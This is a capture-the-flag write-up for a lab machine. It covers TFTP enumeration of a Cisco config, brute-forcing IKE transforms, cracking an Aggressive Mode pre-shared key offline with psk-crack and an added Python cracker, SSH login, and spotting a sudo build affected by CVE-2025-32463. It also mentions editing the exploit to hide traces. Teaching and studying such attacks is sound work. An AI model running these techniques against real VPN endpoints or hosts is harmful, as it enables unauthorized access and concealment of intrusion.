PORT STATE SERVICE VERSION
68/udp open|filtered dhcpc
69/udp open tftp Netkit tftpd or atftpd
| tftp-version:
| p: Netkit tftpd or atftpd
| cpe:
| cpe:/a:netkit:netkit
|_ cpe:/a:lefebvre:atftpd
| tftp-enum:
|_ ciscortr.cfg
500/udp open isakmp?
| ike-version:
| attributes:
| XAUTH
|_ Dead Peer Detection v1.0
4500/udp open|filtered nat-t-ike
22/tcp open ssh OpenSSH 10.0p2
Let's investigate UDP ports 69 and 500.
On port 69, nmap's --script=tftp-enum (which brute-forces common file names) found ciscortr.cfg, which contains:
username ike password *****
<SNIP>
crypto ipsec client ezvpn ezvpnclient
connect auto
group 2 key secret-password
mode client
peer 192.168.100.1
!
<SNIP>
crypto isakmp client configuration group rtr-remote
key secret-password
dns 208.67.222.222
domain expressway.htb
pool dynpool
!
The config gives us a local account called ike with a password, plus an IPsec/IKE VPN (EZVPN) client configuration that authenticates with a group pre-shared key. I'm not too familiar with these tools, though thankfully there is a great read on HackTricks about them.
Let's attempt a basic IKE scan:
ike-scan -M 10.10.11.87
# Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
# 10.10.11.87 Main Mode Handshake returned
# HDR=(CKY-R=48a131ea2dccdc5c)
# SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)
# VID=09002689dfd6b712 (XAUTH)
# VID=afcad71368a1f1c96b8696fc77570100 (Dead Peer Detection v1.0)
#
# Ending ike-scan 1.9.5: 1 hosts scanned in 0.053 seconds (18.88 hosts/sec). 1 returned handshake; 0 returned notify
A returned Main Mode handshake does not by itself prove the device is vulnerable; it tells us the peer still speaks IKEv1 (the legacy protocol, long since superseded by IKEv2) and accepted ike-scan's default proposal. The SA line lists the agreed parameters: 3DES, SHA1, DH group 2 (modp1024) and Auth=PSK, so authentication is by pre-shared key rather than certificates. "1 returned handshake; 0 returned notify" means the peer answered with an SA instead of rejecting the proposal with a notify such as NO-PROPOSAL-CHOSEN, so it is ready to interact with us. This is great news.
Let's try to brute-force a valid transform set (I realized afterwards that the following approach is a bit overkill: because we already got the "1 returned handshake; 0 returned notify" result, we had a simpler alternative than brute force).
# Generate every --trans=ENC,HASH,AUTH,GROUP combination ike-scan understands
for ENC in 1 2 3 4 5 6 7/128 7/192 7/256 8; do
  for HASH in 1 2 3 4 5 6; do
    for AUTH in 1 2 3 4 5 6 7 8 64221 64222 64223 64224 65001 65002 65003 65004 65005 65006 65007 65008 65009 65010; do
      for GROUP in 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18; do
        echo "--trans=$ENC,$HASH,$AUTH,$GROUP"
      done
    done
  done
done > ike-dict.txt
# Brute-force: a transform is accepted when ike-scan reports "1 returned handshake".
# Accepted --trans values are also saved to ike-dict-matches.txt for the Aggressive Mode step below.
while read -r line; do
  sudo ike-scan -M "$line" 10.10.11.87 | grep -q "1 returned handshake" \
    && { echo "Valid trans found: $line"; echo "$line" >> ike-dict-matches.txt; }
done < ike-dict.txt
# Valid trans found: --trans=5,2,1,2
# Valid trans found: --trans=5,2,2,2
# Valid trans found: --trans=5,2,3,2
# Valid trans found: --trans=5,2,4,2
# Valid trans found: --trans=5,2,5,2
# Valid trans found: --trans=5,2,6,2
# Valid trans found: --trans=5,2,7,2
# Valid trans found: --trans=5,2,8,2
# Valid trans found: --trans=5,2,64221,2
# Valid trans found: --trans=5,2,64222,2
# Valid trans found: --trans=5,2,64223,2
# Valid trans found: --trans=5,2,64224,2
# Valid trans found: --trans=5,2,65001,2
# Valid trans found: --trans=5,2,65002,2
# Valid trans found: --trans=5,2,65003,2
# Valid trans found: --trans=5,2,65004,2
# Valid trans found: --trans=5,2,65005,2
# Valid trans found: --trans=5,2,65006,2
# Valid trans found: --trans=5,2,65007,2
# Valid trans found: --trans=5,2,65008,2
# Valid trans found: --trans=5,2,65009,2
# Valid trans found: --trans=5,2,65010,2
(Each --trans value is ENC,HASH,AUTH,GROUP: here ENC 5 = 3DES, HASH 2 = SHA1 and GROUP 2 = modp1024, matching the default handshake, and every authentication method in the dictionary was accepted with that combination.)
Let's see whether those transforms are also accepted in Aggressive Mode and, if so, grab a crackable hash from it. In Aggressive Mode the responder sends its authentication hash HASH_R in the clear, and that hash is keyed (via SKEYID) by the pre-shared key while all its other inputs are visible on the wire, which is exactly what psk-crack needs for an offline dictionary attack.
while read -r line; do
  ike-scan -M -A -Phandshake.txt "$line" 10.10.11.87 | grep -q "SA=" && echo "Valid trans found: $line"
done < ike-dict-matches.txt
cat handshake.txt
# ec6d3... <snip> ...
# `fzf-wordlists` is a local helper that expands to the path of a wordlist; any dictionary file works for -d
psk-crack -d `fzf-wordlists` handshake.txt
# Starting psk-crack [ike-scan 1.9.5] (http://www.nta-monitor.com/tools/ike-scan/)
# Running in dictionary cracking mode
# key "freakingrockstarontheroad" matches SHA1 hash 6f1aed8e65aff2d99dfdae1c15af161c8a813a75
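To make clear why the Aggressive Mode exchange hands us something crackable, here is what psk-crack is doing, as an added Python example that is not part of the original write-up or of ike-scan. The handshake line it works on is constructed rather than captured from the box: the DH public values, cookies and nonces are deterministic filler, the SA body mirrors the 3DES/SHA1/PSK/group-2 proposal and 28800 s lifetime seen above, the IDir is the 192.168.100.1 peer from ciscortr.cfg, and HASH_R is computed from a known PSK. The colon-separated field order (g_xr:g_xi:cky_r:cky_i:sai_b:idir_b:ni_b:nr_b:hash_r) is the one psk-crack's file format uses, taken here as an assumption to check against the man page before feeding it real captures.

```python
import hashlib
import hmac

# IKEv1 hash algorithm IDs as used in ike-scan's --trans=ENC,HASH,AUTH,GROUP (1 = MD5, 2 = SHA1).
HASH_ALGS = {1: "md5", 2: "sha1"}

# Field order of one line in the file written by `ike-scan -A -P<file>` and read by psk-crack
# (assumption: verify against the psk-crack man page before relying on it for real captures).
FIELDS = ("g_xr", "g_xi", "cky_r", "cky_i", "sai_b", "idir_b", "ni_b", "nr_b", "hash_r")


def parse_psk_line(line: str) -> dict:
    """Split a colon-separated hex handshake line into raw byte fields."""
    parts = line.strip().split(":")
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}")
    return {name: bytes.fromhex(value) for name, value in zip(FIELDS, parts)}


def format_psk_line(params: dict) -> str:
    """Inverse of parse_psk_line."""
    return ":".join(params[name].hex() for name in FIELDS)


def compute_hash_r(psk: bytes, p: dict, hash_id: int = 2) -> bytes:
    """Responder hash for PSK-authenticated IKEv1 (RFC 2409, section 5.4):
        SKEYID = prf(psk, Ni_b | Nr_b)
        HASH_R = prf(SKEYID, g^xr | g^xi | CKY-R | CKY-I | SAi_b | IDir_b)
    prf is HMAC with the negotiated hash. Every input except the PSK travels in the
    clear in Aggressive Mode, which is why HASH_R can be attacked offline."""
    alg = HASH_ALGS[hash_id]
    skeyid = hmac.new(psk, p["ni_b"] + p["nr_b"], alg).digest()
    data = p["g_xr"] + p["g_xi"] + p["cky_r"] + p["cky_i"] + p["sai_b"] + p["idir_b"]
    return hmac.new(skeyid, data, alg).digest()


def crack_psk(line: str, wordlist, hash_id: int = 2):
    """Dictionary attack: return the first candidate whose HASH_R matches, else None."""
    p = parse_psk_line(line)
    for word in wordlist:
        if hmac.compare_digest(compute_hash_r(word.encode(), p, hash_id), p["hash_r"]):
            return word
    return None


def _filler(label: str, n: int) -> bytes:
    """Deterministic stand-in for DH public values, cookies and nonces (constructed, not captured)."""
    out = b""
    counter = 0
    while len(out) < n:
        out += hashlib.sha256(f"{label}:{counter}".encode()).digest()
        counter += 1
    return out[:n]


# Constructed SA payload body mirroring the accepted proposal: 3DES, SHA1, PSK, group 2, 28800 s.
SAMPLE_SAI_B = bytes.fromhex(
    "00000001" "00000001"                      # DOI = IPSEC, situation = SIT_IDENTITY_ONLY
    "0000002c" "01010001"                      # proposal payload: len 44, proposal 1, ISAKMP, 1 transform
    "00000024" "01010000"                      # transform payload: len 36, transform 1, KEY_IKE
    "80010005" "80020002" "80030001"           # enc = 3DES (5), hash = SHA1 (2), auth = PSK (1)
    "80040002" "800b0001" "000c000400007080"   # group 2, life type = seconds, life duration = 28800
)
# Constructed IDir payload body: ID_IPV4_ADDR, UDP/500, 192.168.100.1 (the peer in ciscortr.cfg).
SAMPLE_IDIR_B = bytes.fromhex("011101f4c0a86401")


def make_sample_handshake(psk: bytes, hash_id: int = 2) -> str:
    """Build a handshake line of the kind ike-scan -A -P records, with HASH_R derived from `psk`."""
    p = {
        "g_xr": _filler("g_xr", 128), "g_xi": _filler("g_xi", 128),  # modp1024 values are 128 bytes
        "cky_r": _filler("cky_r", 8), "cky_i": _filler("cky_i", 8),
        "sai_b": SAMPLE_SAI_B, "idir_b": SAMPLE_IDIR_B,
        "ni_b": _filler("ni_b", 20), "nr_b": _filler("nr_b", 20),
    }
    p["hash_r"] = compute_hash_r(psk, p, hash_id)
    return format_psk_line(p)


if __name__ == "__main__":
    line = make_sample_handshake(b"freakingrockstarontheroad")
    candidates = ["password", "secret-password", "cisco123", "freakingrockstarontheroad"]
    print("cracked PSK:", crack_psk(line, candidates))
```

The whole attack costs one HMAC pair per candidate, which is why a weak group PSK on an Aggressive Mode endpoint is effectively a password hash handed to anyone who can send a UDP/500 packet. The fix on the device side is Main Mode only (or IKEv2) with a long random PSK, or certificate authentication.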
This could also be the password of the ike account from ciscortr.cfg, so let's try SSH with ike:freakingrockstarontheroad:
ssh ike@10.10.11.87
ls
# user.txt
cat user.txt
# <redacted>
I started looking around for SUID binaries:
find / -type f -perm -4000 2>/dev/null
# /usr/sbin/exim4
# /usr/local/bin/sudo
# /usr/bin/passwd
# /usr/bin/mount
# /usr/bin/gpasswd
# /usr/bin/su
# /usr/bin/sudo
# <SNIP>
Nothing interesting, apart from the odd double sudo?
/usr/local/bin/sudo --version
# Sudo version 1.9.17
# Sudoers policy plugin version 1.9.17
# Sudoers file grammar version 50
# Sudoers I/O plugin version 1.9.17
# Sudoers audit plugin version 1.9.17
/usr/bin/sudo --version
# Sudo version 1.9.13p3
# Sudoers policy plugin version 1.9.13p3
# Sudoers file grammar version 50
# Sudoers I/O plugin version 1.9.13p3
# Sudoers audit plugin version 1.9.13p3
Since /usr/local/bin normally precedes /usr/bin in PATH, a bare `sudo` resolves to the newer 1.9.17 build (check with `command -v sudo`); the older 1.9.13p3 binary in /usr/bin is still SUID root and can be run by its full path.
And it seems that sudo 1.9.13p3 is listed against three different CVEs on the Debian tracker; the one relevant here is /etc/nsswitch.conf being read from a user-controlled directory when sudo is invoked with --chroot= (CVE-2025-32463). These are all interesting, though the last one seems the most aligned with our needs, so let's look at the file in question and where we could attempt this.
nsswitch.conf is the GNU Name Service Switch configuration: glibc reads it to decide which libnss_*.so modules to load for lookups such as passwd and group, so a copy of it that sudo consults from a directory the caller controls decides which shared objects a root process loads. One caveat on versions: the upstream sudo advisory gives 1.9.14 through 1.9.17 inclusive as the range affected by CVE-2025-32463, because the -R/--chroot option only appeared in 1.9.14 and the fix shipped in 1.9.17p1; on this box that range covers the 1.9.17 build in /usr/local/bin rather than the 1.9.13p3 one in /usr/bin, so it is worth checking every sudo binary by full path rather than just the one PATH picks. I found a public exploit for CVE-2025-32463.
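When a box carries more than one sudo, the useful check is to enumerate every SUID copy, read each one's version by full path and compare it against the advisory range instead of trusting whatever `sudo --version` happens to resolve to. The following is an added Python example, not part of the original write-up or of any exploit; the affected range it encodes for CVE-2025-32463 is the upstream advisory's 1.9.14 through 1.9.17 inclusive (fixed in 1.9.17p1), and the directories it walks are assumed defaults.

```python
import os
import re
import stat
import subprocess

# "Sudo version 1.9.13p3" -> (1, 9, 13, 3); a missing pN suffix counts as patch level 0.
_VERSION_RE = re.compile(r"Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")


def parse_sudo_version(banner: str):
    """Parse the first line of `sudo --version`; returns (major, minor, micro, patch) or None."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, micro, patch = m.groups()
    return (int(major), int(minor), int(micro), int(patch or 0))


def chroot_cve_affected(version) -> bool:
    """True if the version lies in the range the upstream advisory gives for CVE-2025-32463:
    1.9.14 through 1.9.17 inclusive. -R/--chroot appeared in 1.9.14, so anything older
    (e.g. 1.9.13p3) has no chroot option; the fix shipped in 1.9.17p1."""
    major, minor, micro, patch = version
    if (major, minor) != (1, 9):
        return False
    if 14 <= micro <= 16:
        return True
    return micro == 17 and patch == 0


def find_suid_binaries(named="sudo",
                       roots=("/usr/bin", "/usr/local/bin", "/usr/sbin", "/bin", "/sbin")):
    """Every set-uid regular file called `named` under the given directories
    (the Python equivalent of `find / -type f -perm -4000 -name sudo`). Assumed default roots."""
    found = set()
    for root in roots:
        for dirpath, _dirs, files in os.walk(root):
            for name in files:
                if name != named:
                    continue
                path = os.path.join(dirpath, name)
                try:
                    st = os.stat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                    found.add(os.path.realpath(path))  # dedupe /bin -> /usr/bin symlinks
    return sorted(found)


def audit_sudo_binaries():
    """Run each SUID sudo by full path and report (path, version, in_affected_range)."""
    report = []
    for path in find_suid_binaries():
        try:
            banner = subprocess.run([path, "--version"], capture_output=True,
                                    text=True, timeout=5).stdout
        except (OSError, subprocess.SubprocessError):
            banner = ""
        ver = parse_sudo_version(banner)
        report.append((path, ver, ver is not None and chroot_cve_affected(ver)))
    return report


if __name__ == "__main__":
    for path, ver, hit in audit_sudo_binaries():
        shown = "unknown" if ver is None else ".".join(map(str, ver[:3])) + (f"p{ver[3]}" if ver[3] else "")
        print(f"{path}\t{shown}\t{'in CVE-2025-32463 range' if hit else 'not in range'}")
```

On the versions shown above this flags /usr/local/bin/sudo (1.9.17) and leaves /usr/bin/sudo (1.9.13p3) alone, which is the opposite of what a glance at "newest version wins" would suggest.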
I first edited the exploit a bit to hide my traces, then downloaded it onto the machine and ran it; I got root and got the flag.
2026 © Philippe Cheype